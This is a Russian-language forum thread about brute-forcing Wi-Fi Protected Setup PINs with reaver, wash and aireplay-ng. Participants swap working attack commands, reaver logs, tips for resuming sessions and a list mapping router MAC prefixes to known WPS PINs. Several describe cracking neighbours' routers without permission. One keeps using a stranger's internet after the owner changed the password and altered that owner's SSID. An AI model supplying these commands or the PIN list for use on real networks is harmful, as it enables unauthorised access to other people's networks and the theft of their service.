PDA

Просмотр полной версии : Уязвимость в протоколе Wi-Fi Protected Setup


Страницы : 1 [2] 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

Ghosttt
09.08.2012, 01:03
бывает и такое, только я после горького опыта стал записывать последний пин на бумаге, в случае не возможности продолжения сессии вбивал продолжение по маске.



как имено если он блокируется полностью на сутку ?

Также может кто поможет.

У меня второй адаптер TP-link TL-WN7200ND, BT5 R1, драйвер показывает rt2800usb. Мониторить он мониторит WPS. Но как только включаю подбор пинов к какой нибудь сети так процесс буксует на 1 пине, и куча ошибок. Пробовал разные сети, по разному прописывал.

Вот лог с ВТ:


[+] Switching mon0 to channel 4
[+] Associated with F4:EC:38:AF:A2:96 (ESSID: Microsoft)
[+] Trying pin 12345670
[+] Switching mon0 to channel 4
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Что делать ? дело в драйвере ? если да, так какой ставить и как именно ?

А то на родном адаптере ноута сломал 1 точку за 5 чесов, а на етом просто 0. Никак, а по дальности все точки которые надо ломать родной не ловит или ловит плохо.

picat
09.08.2012, 01:13
Ghosttt

открой еще одну вкладку терминала и


aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX -e XXX mon0 --ignore-negative-one

H3L1X
09.08.2012, 03:02
...Никак, а по дальности все точки которые надо ломать родной не ловит или ловит плохо.



У меня вывод, который ты даёшь, обычно бывает при низком/неустойчивом сигнале. Поэтому нужно к точке подбираться... для начала. Либо мощность передатчика твоего задирать, но это - 50/50 шанс, что поможет. Если программа точку видит и ассоциируется с ней - значит, карточка и софтина работают корректно, и надо где-то ещё искать причину... Я бы грешил на силу сигнала в данном случае.

Ghosttt
09.08.2012, 03:29
У меня вывод, который ты даёшь, обычно бывает при низком/неустойчивом сигнале. Поэтому нужно к точке подбираться... для начала. Либо мощность передатчика твоего задирать, но это - 50/50 шанс, что поможет. Если программа точку видит и ассоциируется с ней - значит, карточка и софтина работают корректно, и надо где-то ещё искать причину... Я бы грешил на силу сигнала в данном случае.



суть в том что я пробовал разные точки, результат 1.

Даже пробую точку к которой 2 дня назад добыл пин к ВПС адаптером встроенным в ноут, результата 0

Traing pin 12345670.

далее куча ошибок и опять Traing pin 12345670. потом пишет прогрес 0.00% и по второму кругу...

не понимаю в чем проблема...адаптер Tp-link TL-WN7200ND вроде должен работать так как чип там rl3070 а на деле толку с WPS 0.

Может у ково такой адаптер посоветуйте.

kosmaty
09.08.2012, 11:10
У меня точь-в-точь тако адаптер, reaver на нем работает отлично. Одну точку поломал, 2 в работе (медленно идут, потому, что в лок уходят на сутки после 10 попыток - защита такая), а вцелом доволен вполне.

А какую ОС пользуешь? Может дровишки шалят? Или firmware в системе старая?

user_bad
09.08.2012, 11:42
У меня точь-в-точь тако адаптер, reaver на нем работает отлично. Одну точку поломал, 2 в работе (медленно идут, потому, что в лок уходят на сутки после 10 попыток - защита такая), а вцелом доволен вполне.

А какую ОС пользуешь? Может дровишки шалят? Или firmware в системе старая?



У меня тоже такой чип под ви фи слакс 64-2 работает, но есть точки которые просто не подбираются не смотря на всякие уловки, есть netgear которая останавливается на 99989989 пишет что 99.9% и все, может здесь пины куда выкладывать к разным макам, чтобы проверять руками а?

fox.fox
09.08.2012, 11:48
как имено если он блокируется полностью на сутку ?



пока никак наверно, если только терпением, я имел ввиду что после трех недельного брута примерно 80%, на следующий день отказался продолжать сессию (логи тоже были пусты), вот где не приятный сюрприз был, после этого случая если надо было подобрать пин к точке с такими симптомами, последний записывал на бумаге на всяк случай (как оказалось не зря, по крайней мере в моем случае). точка в конце концов сдалась конечно имхо конечно, но скоро халявный WPS прикрутят, с каждым разом все больше точек появляется без оного, спасибо системным администраторам обитающим по этим форумам. пардон за флуд, можете удалить

Ghosttt
09.08.2012, 15:22
У меня точь-в-точь тако адаптер, reaver на нем работает отлично. Одну точку поломал, 2 в работе (медленно идут, потому, что в лок уходят на сутки после 10 попыток - защита такая), а вцелом доволен вполне.

А какую ОС пользуешь? Может дровишки шалят? Или firmware в системе старая?



Ок опишу все как было.

ОС ноутбуку 7, драйвер ТП-линковский с диска, пробовал от Альфы но мне показалось что стало ловить менше точек, переставил назад родной.

Запускаю reaver через usb с загрузочной флешки.

1) airslax_1.2 там reaver 1.4 вшит, в папку модулс перепробывал много драйверов, мониторинг пошел после передьоргивания кабеля адаптера на драйвере rt2x00. Но после начала подбора пина выдайот что сбой присоеденения к точке. Родной адаптер ноутбука Broadcom прекрасно работает там же на драйвере b43, легко подобрал пин и сломал пароль к 1 точке за 5 с лишним часов.

После, решыл что airslax плохо ладит с адаптером, решыл по старинке использовать провереный ВТ5.

2) BT5R1-GNOME-32, драйвер там автоматом показывает rt2800usb, установил reaver-1.4 все как положено.

wash -i mon0 -C -s показывает несколько сетей.

после беру например ту же сеть что уже сломал ранше, на ней перебор был 4 пина\сек, тоесть сигнал хорошый, а поскольку ТП линк сильнее так вопше должно было летать.

Прописываю:

reaver -i mon0 -b XX:XX:XX:XX:XX -vv

или

reaver -i mon0 -b XX:XX:XX:XX:XX -vv --dh-small

и все, начинает буксувать на 1 пине = ступор.

Пробывал как выше советовали в 2 окне прописывать:

aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX -e XXX mon0 --ignore-negative-one

выдает типа: mon0 сечас на канале 7, а точка которую атакую на канале 4. бла бла бла ступор. Если ето важно скопирую кину сюда лог.

И в итоге толку 0.



У меня тоже такой чип под ви фи слакс 64-2 работает



какой драйвер ты используеш ? Тоесть бросаеш в папку модулс ?

picat
09.08.2012, 19:28
...

выдает типа: mon0 сечас на канале 7, а точка которую атакую на канале 4. бла бла бла ступор....



Если aireplay ругается на канал, нужно сначала запустить airodump с требуемым каналом, прим.


airodump-ng mon0 -c 4
Потом в другой вкладке запустить aireplay. После успешной ассоциации airodump следует отключить (он мешает корректной работе ривера). И далее запускаем ривер с включенным aireplay.

Незнаю с чем связано, но у меня половина точек работают только с aireplay (причем при использовании aireplay существует вероятность пропустить правильный ПИН (у меня из 6 точек в 2х пропустил- пришлось заново))

kykyry3ka
09.08.2012, 20:56
Ghosttt

Еcть такой же адаптер ,замечателно работает с reaver-ом,но не в BT5R1,не в бейни а в wifislax 4.1 и xiaopan-0.3.8 http://www.wifislax.com/category/download/nuevas-versiones

http://www.mediafire.com/?l0qrw56rvold50f и что интересно работает он там через minidwep-gtk(клякса),через инфлятор не пашет,с чем это связано не знаю.

Ghosttt
10.08.2012, 18:20
Ghosttt

Еcть такой же адаптер ,замечателно работает с reaver-ом,но не в BT5R1,не в бейни а в wifislax 4.1 и xiaopan-0.3.8 http://www.wifislax.com/category/download/nuevas-versiones

http://www.mediafire.com/?l0qrw56rvold50f и что интересно работает он там через minidwep-gtk(клякса),через инфлятор не пашет,с чем это связано не знаю.



попробывал и 1 и 2.

работает как и у тебя только через кляксу.

но поскольку там не сохроняет сесию, тоесть после перезагрузки комп*ютера перебор начинается с 12345670.

Как начать перебор сразу с конкретного пина, например 50005673

но так что б дальше шло 50015671 а не 50005674 ???

ето реально в wifislax 4.1 или xiaopan-0.3.8 ?

kykyry3ka
10.08.2012, 22:27
Ghosttt

В wifislax 4.1 есть програмка :recording sesion reaver - находится :wifislax/wpa wps/ .Oна сохраняет сесию на рабочий стол ,просто копируешь этот файл к себе на жесткий или на ту-же флешку, а потом после перзагруки запускаешь его ,сессия начнется с момента остановки.В xiaopan-0.3.8 сессия сохраняется по адресу: usr/local/etc/reaver/ там будут файлы с расширением - wpc ,сначала идет мак адрес точки и расширение wpc ,также копируешь этот файл , а потом после перзагрузки перед запуском проги закидываешь его обратно в эту же папку и сесия возобновляется.

Если ты знаешь первые чеыре цифры пина то вводишь в табло : -p XXXX ,где иксы твои цифры.

user_bad
10.08.2012, 23:19
Ghosttt в вифи слаксе и 64 бита и в 32 распознается как 3070 я как бы пользую просто с лайв флешки драйвер вроде пишет RT2070 или типа этого если важно гляну, а внутренний адаптер атерос тоже видит ноут делл 1501

Stranger@
13.08.2012, 17:45
Может кому надо:

Графический интерфейс "Inflator" для удобного использования reaver-wps версии 1.4.

Отлично работает в Backtrack5.

Чтобы установить Inflator, распакуйте архив и в консоле введите: sudo dpkg -i inflator1.0-backtrack5r1-gnome-bit32.deb

GUI качать отсюда:

http://www.ibeini.com/inflator/inflator1.0-backtrack5r1-gnome-bit32.zip



Не обновите ссылки пожалуйста.

user100
13.08.2012, 18:58
Не обновите ссылки пожалуйста.



Зазерклил Inflator for reaver-wps тут: http://rusfolder.com/images/download_1.jpg

Andrei_
17.08.2012, 02:49
Как включить WPS в точке доступа через админку? Все меню перелазил не нашел эти буквы WPS. Вообще это беспроводная точка доступа с adsl модемом.

picat
17.08.2012, 05:11
Andrei_,

модель раутера? не каждый раутер поддерживает wps

Andrei_
17.08.2012, 13:33
Andrei_,

модель раутера? не каждый раутер поддерживает wps



Belkin F1PI243EGau

Заглавная страница админки выдает 2010 год.

user100
17.08.2012, 13:47
Belkin F1PI243EGau

Заглавная страница админки выдает 2010 год.



Здесь посмотри

picat
17.08.2012, 13:54
бегло пробежался по мануалу, походу нет там такой функции

Andrei_
17.08.2012, 20:17
бегло пробежался по мануалу, походу нет там такой функции


Жаль. Придется пока как-то wds на нем настраивать, на случай потери доступа. Интернет через него так сладок. Неразумные владельцы уже меняли на нем пароль, в этот раз еле взломал.

picat
17.08.2012, 22:51
Жаль. Придется пока как-то wds на нем настраивать, на случай потери доступа.



wds - это не панацея в данном случае, при смене паса так и так работать не будет

mahtey
20.08.2012, 18:41
Всем привет стокнулся с такой проблемой при запуске reaver сразу после стандарт 12345678 начинает давать М5 М6 и перебирает вторую часть PIN оставляя 1234 как правильную доходит до 99.99% и не находит.

Пробовал перезапускать без сохранения тоже.Пробовал с диска inflator не помогает такаеже история .

По моему первие 1234 неверная часть pin . Как можно исправить?

uz5hz
26.08.2012, 10:29
Какая из сборок адекватно поддерживает tp link 7220 nd ( без установки драйвера)?Спасибо.

Gloria64
27.08.2012, 15:57
AP Association

Сразу приношу изинения, я тут новичок.

Ситуация следующая. С TL WN7200ND и Backtrack 5R2 (reaver 1.4) почти без дополнительных манипулций успешно сдался МТС-овский рутер. Вдохновившсь упехом, выключаю этот и включаю друогй, стоящий рядом же. В результате Failed to associate. Здесь сигнал гарантировано хороший. Пробую то, что видно рядом - либо Failed to associate, либо переключение каналов. Правда, сигнал там уже существенно хуже - 75-80. С одним законектился при сигнале 83 и даже начал что-то делать. Так вот, суть вопроса: дело в сигнале или всё же в типе рутера "жертвы" и мне просто дико н повезло, что из всех 7-8 подходит для экспериментов только один?

И второй вопрос: что по идее должен писать Wash, если на точке нет WPS? У меня он как-то глухо висит и молчит.

Просветите, пожалуйста, когда будет время.

kosmaty
27.08.2012, 17:06
Ну, насколько я осведомлен в этом вопросе, то WPS должен быть прежде всего активирован на роутере/модеме, во-вторых, проверь состояние интерфейса wlan0(1) ifconfig. Если wlan0 лежит, то ассоциация и не произойдет, т.е. mon0 - это виртуальный интерфейс, через который производится взлом, а wlan0 - это сама карта непосредственно, и она ассоциируется с ТД и должна быть поднята. ifconfig wlan0 up. Я сам несколько раз проверял, пока wlan лежит - reaver не ассоциируется.

Buran
27.08.2012, 19:04
... включаю друогй, стоящий рядом же. В результате Failed to associate.



Попробуйте дополнительно указать ESSID сети: "-e ESSID". Иногда очень помогает. Естественно WPS на точке должен быть включён.



И второй вопрос: что по идее должен писать Wash, если на точке нет WPS? У меня он как-то глухо висит и молчит.

Просветите, пожалуйста, когда будет время.



Если включён WPS, то wash покажет в таблице эту точку. Если нет, то - нет.

_Malina_
27.08.2012, 22:44
Вопрос возник по поводу команды wash и у меня, раньше когда запускал бт5р2 с лив юсб и встроенный в ноут адаптер проблем не было. Сейчас поставил бт5р3 на виртуалку + адаптер сменил на тл7200нд, так вот все хорошо но wash мне выдает ошибку что-то там и большие буквы NPC или NCP точно не помню(сейчас адаптер не с собой) и команда выполняеться непрерывно тоесть строки бегут вниз с той же ошибкой до безконечности. И еще одно с долбаной виртуалкой никак не могу провести деаутефикацию клиента от точки хотя раньше с первым набором(который выше описан) все проходило, параметры задавал разные толку ноль.

uz5hz
27.08.2012, 23:20
допишите в wash -C -s

_Malina_
27.08.2012, 23:34
допишите в wash -C -s



параметры задавал разные толку ноль.

kosmaty
28.08.2012, 11:58
допишите в wash -C -s



Поправлю, полная команда выглядит так: wash -i mono -C - в этом случае вош не будет показывать ошибки, а только чистую таблицу точек с включенным WPS.

Yulik
28.08.2012, 15:05
Ситуация следующая. С TL WN7200ND и Backtrack 5R2 (reaver 1.4) ...



У меня такой же адаптер и BT 5 r1 (reaver 1.4) не работает ни с одной ТД,а старый китайский ноунейм RTL8187l отлично работает со всеми точками.

_Malina_
28.08.2012, 15:13
Поправлю, полная команда выглядит так: wash -i mono -C - в этом случае вош не будет показывать ошибки, а только чистую таблицу точек с включенным WPS.



о_О спасибо помогло только проблема в том что сработало только после того как выдернул и заново вставил в ноут адаптер что-то не так с этой виртуалкой моей.

Gloria64
28.08.2012, 17:41
У меня такой же адаптер и BT 5 r1 (reaver 1.4) не работает ни с одной ТД,а старый китайский ноунейм RTL8187l отлично работает со всеми точками.




Тут у меня был один нюанс (BT5 r2). Во-первых по умолчанию на него почему-то ставится TXPower 0, я меняю на auto. И второй момент airodump-ng сама по себе работает, но адаптер после неё почему-то впадает в транс. У меня решается командами ipcofig wlan0 down, ipconfig wlan0 up. Причём то же самое с дистрибутивом Xiaopan, такчто видимо особенность драйсера.

mahtey
28.08.2012, 22:03
Всем привет стокнулся с такой проблемой при запуске reaver сразу после стандарт 12345678 начинает давать М5 М6 и перебирает вторую часть PIN оставляя 1234 как правильную доходит до 99.99% и не находит ничего .Кто нибудь может чтото посоветовать ? Заранее спасибо.

kosmaty
29.08.2012, 11:29
Есть вопрос: знает ли кто, а если клиенты коннектятся к ТД именно используя технологию WPS, т.е. путем ввода ПИН-кода, есть ли шанс перехватить в эфире этот самый ПИН?

H3L1X
30.08.2012, 12:57
Есть вопрос: знает ли кто, а если клиенты коннектятся к ТД именно используя технологию WPS, т.е. путем ввода ПИН-кода, есть ли шанс перехватить в эфире этот самый ПИН?



Исходя из механики самого процесса - шанс есть) только здесь есть множество узких моментов:

1. Информация зашифрована уникальным шифром, а шифр работает, исходя из ключей Диффи-Хелльмана, которыми обмениваются устройства при передаче пин-кода. Для каждой пары устройств ключи разные, так что, чтобы расшифровать пин, необходимо сначала подобрать эти ключики.

2. Но проблема даже не в самих ключах больше заключается. Обмен пинами - процедура одноразовая. То бишь если для перехвата ключа от точки клиента от неё можно отключать хоть до посинения и ловить хендшейки, то с пином такая тема не прокатит - единожды предоставив свои настройки клиентскому устройству, точке (да и клиенту) нет нужды снова повторять эту процедуру.

Если же очень интересно, как всё это выглядит изнутри, можно взять старый добрый Wireshark, нахватать пакетов, заранее зная, что где-то среди них прячутся пакеты авторизации по WPS, и препарировать, используя это

Вот два основных... Если же интересовал сам факт возможности перехвата - прошу меня извинить за лишние размышления =)

kosmaty
30.08.2012, 13:47
а вот это уже интересненько....

Бум изучать.

Eddi
30.08.2012, 14:52
Интересное у вас тут общение в этом топике. Пару вопросов с вашего разрешения:

1. Удалось подобрать пин к трем точкам. На первую ушло порядка 3- часов на остальные где-то по 10. В 2 -х случаях из 3 пароль reaver'ом не выдавался только пин. Пробовал и "-p " не помогло. Отсюда вопрос, ребят, вообще, в принципе, реально настроить у роутер так, чтобы пароль не вводить, а входить только по пину, если да, то какие подскажите утилиты для ubuntu, чтобы к таким роутерам подключится?

Или может быть есть еще какие-нибудь способы узнать пин по паролю?

Вроде всю тему 2 раза перечитал, но кроме ввода с ключом "-p " вариантов не увидел.

2. И еще, как уже здесь все, наверное, в курсе к некотором роутерам надо ассоциироваться через aireplay-ng. Вот, что у меня получилось при попытке ассоциироваться с некоторыми из них:

aireplay-ng -1 120 -a mon0

No source MAC (-h) specified. Using the device MAC (mac моей карты)

13:33:52 Waiting for beacon frame (BSSID роутера) on channel 5

13:33:52 Sending Authentication Request (Open System)

13:33:52 Authentication successful

13:33:52 Sending Association Request

13:33:57 Sending Authentication Request (Open System) [ACK]

13:33:57 Authentication successful

13:33:57 Sending Association Request [ACK]

13:34:00 Denied (code 12), wrong ESSID or WPA ?

13:34:03 Sending Authentication Request (Open System) [ACK]

13:34:03 Authentication successful

13:34:03 Sending Association Request [ACK]

13:34:03 Denied (code 12), wrong ESSID or WPA ?

13:34:06 Sending Authentication Request (Open System) [ACK]

13:34:06 Authentication successful

13:34:06 Sending Association Request [ACK]

13:34:06 Denied (code 12), wrong ESSID or WPA ?

13:34:09 Sending Authentication Request (Open System) [ACK]

13:34:09 Authentication successful

13:34:09 Sending Association Request [ACK]

13:34:09 Denied (code 12), wrong ESSID or WPA ?

13:34:12 Sending Authentication Request (Open System) [ACK]

13:34:12 Authentication successful

13:34:12 Sending Association Request [ACK]

13:34:12 Denied (code 12), wrong ESSID or WPA ?

13:34:15 Sending Authentication Request (Open System) [ACK]

13:34:15 Authentication successful

13:34:15 Sending Association Request [ACK]

13:34:15 Denied (code 12), wrong ESSID or WPA ?

13:34:18 Sending Authentication Request (Open System) [ACK]

13:34:18 Authentication successful

13:34:18 Sending Association Request [ACK]

13:34:18 Denied (code 12), wrong ESSID or WPA ?

Из-за чего такое может быть? какие у кого варианты?

kosmaty
30.08.2012, 16:03
Обрати внимание: "wrong ESSID or WPA" - укажи ему ESSID - имя сети

Eddi
31.08.2012, 11:02
То есть в aireplay-ng указать вместе с bssid и essid? Или только essid?

avs58
31.08.2012, 23:05
Вопрос к спецам , можно ли с помощью хитрой команды , используя BackTrack 5r3 включить WPS , там где он выключен.

_Malina_
31.08.2012, 23:45
Вопрос к спецам , можно ли с помощью хитрой команды , используя BackTrack 5r3 включить WPS , там где он выключен.



ну разве если Ты протянеш пальца через сетку и нажмешь физически на кнопочку

_Malina_
31.08.2012, 23:47
То есть в aireplay-ng указать вместе с bssid и essid? Или только essid?



Руки есть попробуй и так и так бояться не нужно пк ты этим не поломаешь!

Xe0n
17.09.2012, 11:51
вопрос, ребят, вообще, в принципе, реально настроить у роутер так, чтобы пароль не вводить, а входить только по пину, если да, то какие подскажите утилиты для ubuntu, чтобы к таким роутерам подключится?



присоединяюсь к вопросу, куда вводить ПИН работая по убунтой?

jabberd
17.09.2012, 14:30
присоединяюсь к вопросу, куда вводить ПИН работая по убунтой?



Если я правильно понял вопрос, то примерно так:

1. wpa_supplicant -Dwext -iwlan0 -C/var/run/wpa_supplicant -B

2. wpa_cli wps_reg

или поставить wpa_gui — там ещё проще.

Xe0n
17.09.2012, 18:15
2 jabberd

спасибо. попробую.

и еще такой вопрос ребята. гуглил побобие базы "mac - wps pin"

ничего не нашел. подскажите такая вообще в приоде есть или только самим собирать?

H3L1X
17.09.2012, 18:25
и еще такой вопрос ребята. гуглил побобие базы "mac - wps pin"

ничего не нашел. подскажите такая вообще в приоде есть или только самим собирать?



Читаем пост #174 и #214. Ищи гуи и оттуда бери базу пинов =) вроде бы база периодически обновляется =)

baragoz
19.09.2012, 14:59
Можно ... в текущей версии 1.1.6 где-то так -

здесь приведена небольшая база PIN-кодов, пост #174 - в этой ветке
База постоянно обновляется


А, как это сделать, т.е. базу вытянуть? Если не трудно и с подробностями. СПС.

user100
19.09.2012, 19:46
А, как это сделать, т.е. базу вытянуть? Если не трудно и с подробностями. СПС.



Было уже про базу пинов . Смотри тут.

kosmaty
19.09.2012, 20:03
Нет, человек интересуется, как из этого гуя вытащить ту самую базу, из которой он, гуи, производит сверку МАС-ов, кто-то привел таблицу извлеченных МАС-ов, так вот интересно, как он ее извлек?

Xe0n
19.09.2012, 23:17
роутер dir-620

ривером подобрал пин, пароль ривер не показывает ни при каком раскладе на эту ТД.

из под убунты ничего не получлось, хуже того, из под вин 7

во вкладке Сеть вижу ТД RalinkAPS (судя по МАК адресу это именно тот дир-620), нажимаю настроить, ввожу ПИН, он мне выдает пароль (

всегда разный) кликаю далее -> невозможно настроить роутер (как то так). сигнал отличный.

как приконектиться к этой точке ума не приложу, пин есть и правильный, а толку .

поясните пожалуйста подробно на русском языке что в таком случае делать.

user100
20.09.2012, 00:02
Нет, человек интересуется, как из этого гуя вытащить ту самую базу, из которой он, гуи, производит сверку МАС-ов, кто-то привел таблицу извлеченных МАС-ов, так вот интересно, как он ее извлек?



в WPSCrack-GUI база пинов находиться в файле WPSCrackGUI.gambas, можно любым текстовым редактором открыть и выдрать . Лежит он тут:

PHP:



/usr/bin/


Особого смысла в этом правда не вижу, ведь удобнее через ГУЙ их искать.

baragoz
20.09.2012, 16:16
Особого смысла в этом правда не вижу, ведь удобнее через ГУЙ их искать.



Прогнал по всем доступным версиям. Выдрал базы. Составил свою базу+еще кое что надыбал. Доволен. Главное-понял что-к-чему. Большое спасибо!

EdjOne
22.09.2012, 02:51
Прогнал по всем доступным версиям. Выдрал базы. Составил свою базу+еще кое что надыбал. Доволен. Главное-понял что-к-чему. Большое спасибо!



А поделиться?

Nolan
23.09.2012, 14:46
А никто не сталкивался с подробным описанием процесса атаки? Согласно этому документу для взлома станции требуется отправка 4 сообщений и получение соответствующего количества ответов. Заглянуть в эти сообщения можно с помощью wireshark или же в reave'ре есть функция подробного описания?

У кого есть информация, прошу ответить.

Заранее спасибо.

user100
23.09.2012, 15:52
А никто не сталкивался с подробным описанием процесса атаки? Согласно этому документу для взлома станции требуется отправка 4 сообщений и получение соответствующего количества ответов. Заглянуть в эти сообщения можно с помощью wireshark или же в reave'ре есть функция подробного описания?

У кого есть информация, прошу ответить.

Заранее спасибо.



Reaver на этой уязвимости и работает. Первую страничку этой темы прочитай.

niku
24.09.2012, 04:10
Я запустил wifislax, потом wps crackGUI активировал адаптер алфа и стал сканировать ат. процесс пошел нормально . потом Я хотел посмотреть базу с пинами ,но она не открывается вернее нужен инет.Однако, когда я подключаюсь к инету через wifislax не работает wps crack GUI с инетом и наоборот .

Как-же подключит wps crack GUI к инету для обновления базы .

Заранее очень благодарен,

baragoz
24.09.2012, 08:59
Как-же подключит wps crack GUI к инету для обновления базы .

Заранее очень благодарен,



База уже зашита в гуи, обновить можно только саму утилиту (в ней база). А ссылку тебе давали страницей раньше, там и последняя версия с обновленной базой. Но, можно, купив бубен, ручками переписать файлик WPSCrackGUI.gambas добавив туда свое, но это уже для гурманов. Ведь страницей раньше user100 уже все разжевал, большое ему спасибо!

Xe0n
26.09.2012, 00:33
роутер dir-620

ривером подобрал пин, пароль ривер не показывает ни при каком раскладе на эту ТД.

из под убунты ничего не получлось, хуже того, из под вин 7

во вкладке Сеть вижу ТД RalinkAPS (судя по МАК адресу это именно тот дир-620), нажимаю настроить, ввожу ПИН, он мне выдает пароль (

всегда разный) кликаю далее -> невозможно настроить роутер (как то так). сигнал отличный.

как приконектиться к этой точке ума не приложу, пин есть и правильный, а толку .

поясните пожалуйста подробно на русском языке что в таком случае делать.



вобщем разобрался что делать с пином, с помощью родной ралинковской утилиты создал ВПС профиль и подключился к сети, единственный момент, когда настраивал, забыл указать старый SSID, а на веб морде оказался не дефолтовый пароль.

владелец все потом исправил, надеюсь он подумал что это глюк. вопрос. еслии при настройке/подключении задал какой нибудь SSID возможно ли его как то потом изменить, кроме как через веб морду? пробовал опять через пин, удалял профили и дт. не получалось.

Nolan
26.09.2012, 21:58
Reaver на этой уязвимости и работает. Первую страничку этой темы прочитай.



Этого недостаточно, мне нужно полное описание процесса взлома, что посылается, что приходит

user100
26.09.2012, 22:50
Этого недостаточно, мне нужно полное описание процесса взлома, что посылается, что приходит



Вот тут процесс расписан подробно и по русски:тыц.

Или тот же PDF штудируйте, ссылкуна который Вы дали.

kosmaty
27.09.2012, 12:26
Статей по обсуждаемой уязвимости море, во многих из них сказано, что даже при отбитой опции WPS некоторые роутеры подвержены взлому, т.е. - отключенный WPS не совсем отключен. Так вот возник вопрос: что нужно для взлома таких вот, недоотключенных?

Xe0n
27.09.2012, 23:48
что нужно для взлома таких вот, недоотключенных?



а они разве как то подругому буду ломаться? я так понимаю опция ВПС отключается для пользоветеля в веб интрефейсе, а пофакту может остаться, но мне такие роутеры не попадались по факту. на своем тп линк 842 проверял если впс отключаеть, то уже все, никак.

baragoz
28.09.2012, 04:59
Немного подправил и добавил базу. Некоторые пины разорвались, если надо поправьте ручками, сам не могу.


00:0B:3B 3814XXXX
00:0C:F1 30447028
00:11:6B 3042XXXX
00:14:D1 26848185,1234XXXX
00:18:02 16546615
00:18:E7 15537782
00:19:15 12345670
00:19:70 12345670,64637129,22310298
00:1A:2B 15624697,8847XXXX
00:1D:19 12345670,66026402
00:1D:73 88420707
00:1D:7E 66026402
00:1D:CE 85560130
00:21:29 64637129,22310298
00:21:91 82744458
00:22:F7 2456XXXX
00:24:01 97744757
00:24:17 31011193
00:26:24 95374611
00:26:44 7820XXXX,78202962
00:26:5A 76971464
00:26:CE 1148XXXX,11446958,7026XXXX,7047XXXX,9566XXXX,10770 511,32754544,28161141,09735651,2091XXXX,11508335,1 1516675,11450764,11515562,11432401,11455776,115167 05,11509059,11483465,11480044
00:26:E8 15483607
00:38:72 1562XXXX,18836486
00:48:7A 15471628
00:4F:62 21207136
04:C0:6F 0751XXXX
08:86:3B 21250491,3737XXXX
1A:0B:40 17068161
1C:7E:E5 6041XXXX,22609298,60418579
1C:AF:F7 0630XXXX
20:2B:C1 1957XXXX
20:4E:7F 45197079
2C:B0:5D 5482XXXX
30:39:F2 1670XXXX,16538061,4329XXXX,1340XXXX
30:46:9A 9754XXXX,95221XXX,3444XXXX,344449XX,1504XXXX,19482 417,95221021
34:08:04 36022656,93395274
38:60:77 12345670,78985933,7898XXXX
38:72:C0 12345678
40:4A:03 11866428
50:67:F0 20064525
54:E6:FC 5325XXXX,53256XXX,9999XXXX
58:6D:8F 47158382,69382161
58:6D:8F 69382161
58:98:35 53890894
5C:33:8E 82848439,11765592,43154XXX,9901XXXX
5C:35:3B 64874487,6487XXXX,9575XXXX
62:C0:6F 3663XXXX,3442XXXX
64:68:0C 7996XXXX
68:C0:6F 41719565
6A:A8:E4 3416XXXX
6A:C0:6F 3722XXXX
6A:C7:14 3205XXXX
72:A8:E4 3357XXXX
72:C0:6F 3863XXXX
74:44:01 3555XXXX,00446747,2761XXXX,27615126
78:A2:E4 5390XXXX
7C:4F:B5 75332662,72688656,00948135
84:A8:E4 7996XX00
84:C9:B2 54772373
88:25:2C 7654XXXX,03526859,7442XXXX,74425648,3565XXXX,0452X XXX
94:0C:6D 3795XXXX
94:44:52 93645348,2444XXXX,5319XXXX,26023809
A0:21:87 92442559
A0:21:B7 63825XXX,0634XXXX,01318104,6557XXXX,0669XXXX,0996X XXX
B0:48:7A 0055XXXX,54335677,1111XXXX
BC:76:70 6326XXXX,6343XXXX,63431919
C0:3F:0E 8345XXXX,2585XXXX,2503XXXX
C0:AC:54 8345XXXX,2585XXXX,2503XXXX
C0:C1:C0 78985933,7898XXXX,04840954
C4:3D:C7 5141XXXX,51419981,6810XXXX
C8:3A:35 01756401
CC:5D:4E 53084682
CC:96:77 12345670,78985933,7898XXXX
CC:96:A0 5051XXXX
CO:3F:0E 8321XXXX,25032918
DC:0B:1A 1653XXXX,1835XXXX
E0:69:95 2456XXXX
E0:CB:4E 62987523
F4:3E:61 47158382,69382161
F4:C7:14 12345670,5141XXXX,51419981,6810XXXX
F4:EC:38 26599625,146076XX,1452XXXX,18674095
F8:D1:11 4867XXXX
FC:75:16 46264848
Дополняйте, кто, чем может-поможет. Реально - знание пина (хотя бы 4-х первых цифр - 90,96% сделанной работы).

baragoz
28.09.2012, 07:36
Цитата с соседнего форума:



на некоторых роутерах при отключении WPS он всеравно продолжает работать..... хоть в интерфейсе роутера показывает что WPS отключено. такая вот ситуевина спасибо производителям роутеров



У меня тоже есть такая точка. Подбор пинов происходит только тогда, когда отображается (неважно в какой утилите) wps. Сложность в том, что wps не всегда отображается. Не думаю, что хозяин точки балуется этим. И как это победить?

ЗЫ: сигнал оч.хороший.

niku
30.09.2012, 17:35
Используя wifi slax 4.2 ,я открыл файл с базой пинов из утилиты WPS crackGUI.. и дописал там несколько мак. и пинов ,однако при вводе этих маков с заранее известных пинов в программе WPS crackGUI ,она не выдает ожидаемого пина.КАК правильно дописать и дополнить базу в самой утилите?

palec1923
30.09.2012, 20:42
Цитата с соседнего форума:

У меня тоже есть такая точка. Подбор пинов происходит только тогда, когда отображается (неважно в какой утилите) wps. Сложность в том, что wps не всегда отображается. Не думаю, что хозяин точки балуется этим. И как это победить?

ЗЫ: сигнал оч.хороший.



